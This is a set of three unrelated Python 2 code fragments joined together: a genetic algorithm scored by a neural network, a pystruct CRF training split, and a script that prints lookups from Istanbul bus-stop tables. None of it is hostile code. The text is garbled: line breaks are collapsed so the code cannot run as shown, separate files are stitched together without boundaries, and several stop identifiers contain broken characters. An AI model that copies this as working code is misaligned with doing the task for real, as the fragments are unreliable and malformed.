import numpy as np import math import ann import loader inps = loader.load('paru.xlsx') inps = loader.stringifyVar(inps,loader.normalizeVar(loader.getVar(inps))) # inps = loader.loadDat('titanic.dat') def fitness(kr): # return plus(kr) # print len(kr) return 1/(ann.epoch(inps,kr)+0.1) # return ann.epoch(inps,kr) def plus(kr): return 1/((kr[0]+kr[1])+0.001) def initKromosom(kl,interval): kr = np.array([(np.random.uniform()*(2*interval))-interval for i in xrange(kl)]) # kr = [] # for i in range(kl): # kr.append((np.random.uniform()*(2*interval))-interval) return kr def initPop(pops,kl,interval): pop = np.array([initKromosom(kl,interval) for i in xrange(pops)]) # pop = [] # for i in range(pops): # pop.append(initKromosom(kl,interval)) return pop
import random import numpy as np import util import loader from pystruct.models import ChainCRF from pystruct.learners import (NSlackSSVM, OneSlackSSVM, SubgradientSSVM, FrankWolfeSSVM) directory = "/Users/thijs/dev/boilerplate/src/main/resources/dataset/" featureset = "features3" print("Load files") features, labels = \ loader.load(featureset+'.csv', 'labels.csv', directory) # print("Shuffle results") # features, labels = util.shuffle(features, labels) trsize = int(0.7*len(labels)) X_train = features[1:trsize] y_train = labels[1:trsize] X_test = features[trsize+1:] y_test = labels[trsize+1:] # X_train = X_test = features # y_train = y_test = labels # trsize = len(labels) # Evaluate the chain
# coding=utf-8 import loader import pickle import numpy as np from create import * import itertools duraklar, next_stops, sr, routestops, k = loader.load() print "durak", duraklar['L0139J'] print "durak", duraklar['�05A'] print "durak", duraklar['�15L'] # taksim print "next stops", next_stops['L0168A'] print "next stops", next_stops['L0167B'] print "next stops", next_stops['L0166B'] print "next stops", next_stops['L0153D'] print "next stops", next_stops['A0617B'] print "next stops", next_stops['L0167B'] print "sr", sr['L0168A'] print "sr", sr['�15L'] print "sr", sr['L0152A'] print "sr", sr['L0152B'] print 'routestops', routestops['59N'] print "K", K(k, '59N', 'L0168A')